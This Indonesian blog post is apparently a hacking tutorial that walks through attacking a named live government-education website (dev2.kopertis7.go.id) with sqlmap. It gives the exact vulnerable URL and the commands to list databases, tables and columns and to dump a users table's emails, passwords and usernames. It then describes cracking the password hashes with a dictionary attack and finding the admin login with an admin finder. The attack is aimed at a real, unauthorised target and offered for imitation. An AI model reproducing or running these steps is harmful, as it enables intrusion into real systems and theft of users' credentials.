Yo kembali lagi bersama gw yukinoshita 47 kali ini gw mau sharing tutorial tentang SQL Map banyak jg sih yg request sampe bosan gw denger nya wkwkwkwkwk.
oke kali ini live target tutorial nya http://dev2.kopertis7.go.id seperti gambar dibawah ini bug nya terletak di http://dev2.kopertis7.go.id/gallery_info.php?id=35
masukkan perintah
root@yukinoshita47:~# sqlmap -u http://situstarget.com --dbs
contoh :root@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 --dbs
biarkan tool nya berjalan seperti gambar dibawa ini
jika muncul persetujuan buat lanjutkan eksekusi ketik y terus tekan enter seperti gambar dibawah ini
jika berhasil maka akan muncul seperti gambar dibawah ini :
lalu untuk melihat tabel dari database tersebut eksekusi perintah
root@yukinoshita47:~# sqlmap -u http://situstarget.com -D namadatabase --table
contohroot@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 -D kopertisdb --table
kemudian tekan enter maka akan muncul seperti gambar dibawah ini.
selanjut nya untuk melihat isi dari tabel tersebut perintahnya adalah
root@yukinoshita47:~# sqlmap -u http://situstarget.com -D namadatabase --columns
contoh :root@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 -D kopertisdb --columns
kemudian tekan enter maka akan muncul seperti gambar dibawah ini.
setelah itu kolom-kolom dari tabel database tersebut akan kelihatan seperti gambar dibawah ini.
untuk melihat isi dari kolom dan tabel tadi adalah menggunakan perintah.
root@yukinoshita47:~# sqlmap -u http://situstarget.com -D namadatabase -T namatabel -C namakolom --dump
contohroot@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 -D kopertisdb -T users -C email,password,user_id,username --dump
kemudian tekan enter dan akan muncul seperti gambar dibawah ini sqlmap akan meminta persetujuan untuk menggunakan tools lainnya disini saya iya kan dengan menekan y dan kemudian tekan enter
kemudian muncul lagi persetujuan untuk menggunakan metode dictionary attack atau bruteforce tekan aja y kemudian tekan enter.
kemudian ada 3 pilihan
- 1 menggunakan wordlist default bawaan sqlmap
- 2 menggunakan wordlist custom
- 3 menggunakan file wordlist
disini saya pilih aja default dengan menekan 1 kemudian tekan enter
kemudian akan muncul seperti gambar dibawah ini kali ini tergantung keinginan saja disini saya pilih tidak dengan menekan n kemudian tekan enter
biarkan sqlmap crack hash password nya
jika berhasil akan muncul seperti gambar dibawah ini.
oke untuk mencari dimana login nya ya seperti biasa kalian cari aja pake admin finder :p
untuk log pentest dari SQLMap di tutorial ini klik disini
oke cukup sampe disini tutorial nya sekian dan terimakasih